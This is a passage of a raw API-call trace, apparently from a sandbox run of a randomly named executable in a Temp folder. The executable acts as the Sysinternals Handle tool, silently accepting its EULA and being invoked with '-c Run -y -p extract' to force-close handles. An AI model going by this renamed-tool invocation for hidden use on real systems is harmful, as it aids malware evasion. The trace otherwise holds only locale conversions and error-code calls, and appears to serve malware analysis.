lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x14000c2d0, hStdError=0x1d3560)) [0296.182] GetStdHandle (nStdHandle=0xfffffff6) returned 0x8 [0296.182] GetFileType (hFile=0x8) returned 0x2 [0296.182] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0296.182] GetFileType (hFile=0xc) returned 0x2 [0296.182] GetStdHandle (nStdHandle=0xfffffff4) returned 0x10 [0296.182] GetFileType (hFile=0x10) returned 0x2 [0296.182] GetCommandLineW () returned="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner" [0296.182] GetEnvironmentStringsW () returned 0x1d44f0* [0296.182] FreeEnvironmentStringsW (penv=0x1d44f0) returned 1 [0296.182] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14002c980, nSize=0x104 | out: lpFilename="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe")) returned 0x33 [0296.184] GetLastError () returned 0x0 [0296.184] SetLastError (dwErrCode=0x0) [0296.184] GetLastError () returned 0x0 [0296.184] SetLastError (dwErrCode=0x0) [0296.184] GetLastError () returned 0x0 [0296.184] SetLastError (dwErrCode=0x0) [0296.184] GetACP () returned 0x4e4 [0296.184] GetLastError () returned 0x0 [0296.184] SetLastError (dwErrCode=0x0) [0296.184] IsValidCodePage (CodePage=0x4e4) returned 1 [0296.184] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fe00 | out: lpCPInfo=0x14fe00) returned 1 [0296.184] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f8a0 | out: lpCPInfo=0x14f8a0) returned 1 [0296.184] GetLastError () returned 0x0 [0296.184] SetLastError (dwErrCode=0x0) [0296.184] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0296.184] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x14f5a0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⭤") returned 256 [0296.184] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⭤", cchSrc=256, lpCharType=0x14fbc0 | out: lpCharType=0x14fbc0) returned 1 [0296.184] GetLastError () returned 0x0 [0296.185] SetLastError (dwErrCode=0x0) [0296.185] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0296.185] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x14f590, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0296.185] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0296.185] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f380, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0296.185] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f9c0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0296.185] GetLastError () returned 0x0 [0296.185] SetLastError (dwErrCode=0x0) [0296.185] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0296.185] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f8c0, cbMultiByte=256, lpWideCharStr=0x14f590, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0296.185] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0296.185] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f380, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0296.185] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14fac0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0296.185] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x140010890) returned 0x0 [0296.185] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffaf70d0000 [0296.185] GetProcAddress (hModule=0x7ffaf70d0000, lpProcName="IsWow64Process") returned 0x7ffaf70ee960 [0296.185] GetCurrentProcess () returned 0xffffffffffffffff [0296.185] IsWow64Process (in: hProcess=0xffffffffffffffff, Wow64Process=0x14fef0 | out: Wow64Process=0x14fef0) returned 1 [0296.186] GetLastError () returned 0x0 [0296.186] SetLastError (dwErrCode=0x0) [0296.186] GetLastError () returned 0x0 [0296.186] SetLastError (dwErrCode=0x0) [0296.186] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Sysinternals", ulOptions=0x0, samDesired=0x101, phkResult=0x14fc10 | out: phkResult=0x14fc10*=0x0) returned 0x2 [0296.186] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals", ulOptions=0x0, samDesired=0x101, phkResult=0x14fc10 | out: phkResult=0x14fc10*=0x14c) returned 0x0 [0296.186] RegQueryValueExW (in: hKey=0x14c, lpValueName="EulaAccepted", lpReserved=0x0, lpType=0x0, lpData=0x14fc40, lpcbData=0x14fc48*=0x4 | out: lpType=0x0, lpData=0x14fc40*=0x0, lpcbData=0x14fc48*=0x4) returned 0x2 [0296.186] RegCloseKey (hKey=0x14c) returned 0x0 [0296.186] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals\\Handle", ulOptions=0x0, samDesired=0x101, phkResult=0x14fc10 | out: phkResult=0x14fc10*=0x14c) returned 0x0 [0296.186] RegQueryValueExW (in: hKey=0x14c, lpValueName="EulaAccepted", lpReserved=0x0, lpType=0x0, lpData=0x14fc40, lpcbData=0x14fc48*=0x4 | out: lpType=0x0, lpData=0x14fc40*=0x1, lpcbData=0x14fc48*=0x4) returned 0x0 [0296.186] RegCloseKey (hKey=0x14c) returned 0x0 [0296.186] GetLastError () returned 0x0 [0296.186] SetLastError (dwErrCode=0x0) [0296.186] GetLastError () returned 0x0 [0296.186] SetLastError (dwErrCode=0x0) [0296.186] RegCreateKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals\\Handle", phkResult=0x14fc38 | out: phkResult=0x14fc38*=0x14c) returned 0x0 [0296.187] RegSetValueExW (in: hKey=0x14c, lpValueName="EulaAccepted", Reserved=0x0, dwType=0x4, lpData=0x14fc30*=0x1, cbData=0x4 | out: lpData=0x14fc30*=0x1) returned 0x0 [0296.187] RegCloseKey (hKey=0x14c) returned 0x0 [0296.187] GetLastError () returned 0x0 [0296.187] SetLastError (dwErrCode=0x0) [0296.187] GetLastError () returned 0x0 [0296.187] SetLastError (dwErrCode=0x0) [0296.187] GetLastError () returned 0x0 [0296.187] SetLastError (dwErrCode=0x0) [0296.187] GetLastError () returned 0x0 [0296.187] SetLastError (dwErrCode=0x0) [0296.187] GetLastError () returned 0x0 [0296.187] SetLastError (dwErrCode=0x0) [0296.187] GetLastError () returned 0x0 [0296.187] SetLastError (dwErrCode=0x0) [0296.187] GetLastError () returned 0x0 [0296.187] SetLastError (dwErrCode=0x0) [0296.187] GetLastError () returned 0x0 [0296.188] SetLastError (dwErrCode=0x0) [0296.188] GetLastError () returned 0x0 [0296.188] SetLastError (dwErrCode=0x0) [0296.188] GetLastError () returned 0x0 [0296.188] SetLastError (dwErrCode=0x0) [0296.188] GetLastError () returned 0x0 [0296.188] SetLastError (dwErrCode=0x0) [0296.188] GetLastError () returned 0x0 [0296.188] SetLastError (dwErrCode=0x0) [0296.188] GetLastError () returned 0x0 [0296.188] SetLastError (dwErrCode=0x0) [0296.188] GetLastError () returned 0x0 [0296.188] SetLastError (dwErrCode=0x0) [0296.188] GetLastError () returned 0x0 [0296.188] SetLastError (dwErrCode=0x0) [0296.188] GetLastError () returned 0x0 [0296.188] SetLastError (dwErrCode=0x0) [0296.188] GetLastError () returned 0x0 [0296.188] SetLastError (dwErrCode=0x0) [0296.188] GetLastError () returned 0x0 [0296.188] SetLastError (dwErrCode=0x0) [0296.188] GetLastError () returned 0x0 [0296.188] SetLastError (dwErrCode=0x0) [0296.188] GetLastError () returned 0x0 [0296.188] SetLastError (dwErrCode=0x0) [0296.188] GetLastError () returned 0x0 [0296.188] SetLastError (dwErrCode=0x0) [0296.188] GetLastError () returned 0x0 [0296.188] SetLastError (dwErrCode=0x0) [0296.188] GetLastError () returned 0x0 [0296.188] SetLastError (dwErrCode=0x0) [0296.188] GetLastError () returned 0x0 [0296.188] SetLastError (dwErrCode=0x0) [0296.188] GetLastError () returned 0x0 [0296.188] SetLastError (dwErrCode=0x0) [0296.188] GetLastError () returned 0x0 [0296.188] SetLastError (dwErrCode=0x0) [0296.188] GetLastError () returned 0x0 [0296.188] SetLastError (dwErrCode=0x0) [0296.188] GetLastError () returned 0x0 [0296.188] SetLastError (dwErrCode=0x0) [0296.188] GetLastError () returned 0x0 [0296.188] SetLastError (dwErrCode=0x0) [0296.188] GetLastError () returned 0x0 [0296.188] SetLastError (dwErrCode=0x0) [0296.189] GetLastError () returned 0x0 [0296.189] SetLastError (dwErrCode=0x0) [0296.189] GetLastError () returned 0x0 [0296.189] SetLastError (dwErrCode=0x0) [0296.189] GetLastError () returned 0x0 [0296.189] SetLastError (dwErrCode=0x0) [0296.189] GetLastError () returned 0x0 [0296.189] SetLastError (dwErrCode=0x0) [0296.189] GetLastError () returned 0x0 [0296.189] SetLastError (dwErrCode=0x0) [0296.189] GetLastError () returned 0x0 [0296.189] SetLastError (dwErrCode=0x0) [0296.189] GetLastError () returned 0x0 [0296.189] SetLastError (dwErrCode=0x0) [0296.189] GetLastError () returned 0x0 [0296.189] SetLastError (dwErrCode=0x0) [0296.189] GetLastError () returned 0x0 [0296.189] SetLastError (dwErrCode=0x0) [0296.189] GetLastError () returned 0x0 [0296.189] SetLastError (dwErrCode=0x0) [0296.189] GetLastError () returned 0x0 [0296.189] SetLastError (dwErrCode=0x0) [0296.189] GetLastError () returned 0x0 [0296.189] SetLastError (dwErrCode=0x0) [0296.189] GetLastError () returned 0x0 [0296.189] SetLastError (dwErrCode=0x0) [0296.189] GetLastError () returned 0x0 [0296.189] SetLastError (dwErrCode=0x0) [0296.189] GetLastError () returned 0x0 [0296.189] SetLastError (dwErrCode=0x0) [0296.189] GetLastError () returned 0x0 [0296.189] SetLastError (dwErrCode=0x0) [0296.189] GetLastError () returned 0x0 [0296.189] SetLastError (dwErrCode=0x0) [0296.189] GetLastError () returned 0x0 [0296.189] SetLastError (dwErrCode=0x0) [0296.189] GetLastError () returned 0x0 [0296.190] SetLastError (dwErrCode=0x0) [0296.190] GetLastError () returned 0x0 [0296.190] SetLastError (dwErrCode=0x0) [0296.190] GetLastError () returned 0x0 [0296.190] SetLastError (dwErrCode=0x0) [0296.190] GetLastError () returned 0x0 [0296.190] SetLastError (dwErrCode=0x0) [0296.190] GetLastError () returned 0x0 [0296.190] SetLastError (dwErrCode=0x0) [0296.190] GetLastError () returned 0x0 [0296.190] SetLastError (dwErrCode=0x0) [0296.190] GetLastError () returned 0x0 [0296.190] SetLastError (dwErrCode=0x0) [0296.190] GetLastError () returned 0x0 [0296.190] SetLastError (dwErrCode=0x0) [0296.190] GetLastError () returned 0x0 [0296.190] SetLastError (dwErrCode=0x0) [0296.190] GetLastError () returned 0x0 [0296.190] SetLastError (dwErrCode=0x0) [0296.190] GetLastError () returned 0x0 [0296.190] SetLastError (dwErrCode=0x0) [0296.190] GetLastError () returned 0x0 [0296.190] SetLastError (dwErrCode=0x0) [0296.190] GetLastError () returned 0x0 [0296.190] SetLastError (dwErrCode=0x0) [0296.190] GetLastError () returned 0x0 [0296.190] SetLastError (dwErrCode=0x0) [0296.190] GetLastError () returned 0x0 [0296.190] SetLastError (dwErrCode=0x0) [0296.190] GetLastError () returned 0x0 [0296.190] SetLastError (dwErrCode=0x0) [0296.190] GetLastError () returned 0x0 [0296.190] SetLastError (dwErrCode=0x0) [0296.190] GetLastError () returned 0x0 [0296.190] SetLastError (dwErrCode=0x0) [0296.190] GetLastError () returned 0x0 [0296.190] SetLastError (dwErrCode=0x0) [0296.190] GetLastError () returned 0x0 [0296.190] SetLastError (dwErrCode=0x0) [0296.190] GetLastError () returned 0x0 [0296.190] SetLastError (dwErrCode=0x0) [0296.190] GetLastError () returned 0x0 [0296.190] SetLastError (dwErrCode=0x0) [0296.190] GetLastError () returned 0x0 [0296.190] SetLastError (dwErrCode=0x0) [0296.190] GetLastError () returned 0x0 [0296.191] SetLastError (dwErrCode=0x0) [0296.191] GetLastError () returned 0x0 [0296.191] SetLastError (dwErrCode=0x0) [0296.191] GetLastError () returned 0x0 [0296.191] SetLastError (dwErrCode=0x0) [0296.191] GetLastError () returned 0x0 [0296.191] SetLastError (dwErrCode=0x0) [0296.191] GetLastError () returned 0x0 [0296.191] SetLastError (dwErrCode=0x0) [0296.191] GetLastError () returned 0x0 [0296.191] SetLastError (dwErrCode=0x0) [0296.191] GetLastError () returned 0x0 [0296.191] SetLastError (dwErrCode=0x0) [0296.191] GetLastError () returned 0x0 [0296.191] SetLastError (dwErrCode=0x0) [0296.191] GetLastError () returned 0x0 [0296.191] SetLastError (dwErrCode=0x0) [0296.191] GetLastError () returned 0x0 [0296.191] SetLastError (dwErrCode=0x0) [0296.191] GetLastError () returned 0x0 [0296.191] SetLastError (dwErrCode=0x0) [0296.191] GetLastError () returned 0x0 [0296.191] SetLastError (dwErrCode=0x0) [0296.191] GetLastError () returned 0x0 [0296.191] SetLastError (dwErrCode=0x0) [0296.191] GetLastError () returned 0x0 [0296.191] SetLastError (dwErrCode=0x0) [0296.191] GetLastError () returned 0x0 [0296.191] SetLastError (dwErrCode=0x0) [0296.191] GetLastError () returned 0x0 [0296.191] SetLastError (dwErrCode=0x0) [0296.191] GetLastError () returned 0x0 [0296.191] SetLastError (dwErrCode=0x0) [0296.191] GetLastError () returned 0x0 [0296.191] SetLastError (dwErrCode=0x0) [0296.191] GetLastError () returned 0x0 [0296.191] SetLastError (dwErrCode=0x0) [0296.191] GetLastError () returned 0x0 [0296.191] SetLastError (dwErrCode=0x0) [0296.191] GetLastError () returned 0x0 [0296.191] SetLastError (dwErrCode=0x0) [0296.191] GetLastError () returned 0x0 [0296.191] SetLastError (dwErrCode=0x0) [0296.191] GetLastError () returned 0x0 [0296.192] SetLastError (dwErrCode=0x0) [0296.192] GetLastError () returned 0x0 [0296.192] SetLastError (dwErrCode=0x0) [0296.192] GetLastError () returned 0x0 [0296.192] SetLastError (dwErrCode=0x0) [0296.192] GetLastError () returned 0x0 [0296.192] SetLastError (dwErrCode=0x0) [0296.192] GetLastError () returned 0x0 [0296.192] SetLastError (dwErrCode=0x0) [0296.192] GetLastError () returned 0x0 [0296.192] SetLastError (dwErrCode=0x0) [0296.192] GetLastError () returned 0x0 [0296.192] SetLastError (dwErrCode=0x0) [0296.192] GetLastError () returned 0x0 [0296.192] SetLastError (dwErrCode=0x0) [0296.192] GetLastError () returned 0x0 [0296.192] SetLastError (dwErrCode=0x0) [0296.192] GetLastError () returned 0x0 [0296.192] SetLastError (dwErrCode=0x0) [0296.192] GetLastError () returned 0x0 [0296.192] SetLastError (dwErrCode=0x0) [0296.192] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x14e2b4 | out: lpMode=0x14e2b4) returned 1 [0296.257] WriteFile (in: hFile=0xc, lpBuffer=0x14e980*, nNumberOfBytesToWrite=0x65, lpNumberOfBytesWritten=0x14e2a0, lpOverlapped=0x0 | out: lpBuffer=0x14e980*, lpNumberOfBytesWritten=0x14e2a0*=0x65, lpOverlapped=0x0) returned 1 [0296.279] GetLastError () returned 0x0 [0296.279] SetLastError (dwErrCode=0x0) [0296.279] GetLastError () returned 0x0 [0296.279] SetLastError (dwErrCode=0x0) [0296.279] GetLastError () returned 0x0 [0296.279] SetLastError (dwErrCode=0x0) [0296.279] GetLastError () returned 0x0 [0296.279] SetLastError (dwErrCode=0x0) [0296.279] GetLastError () returned 0x0 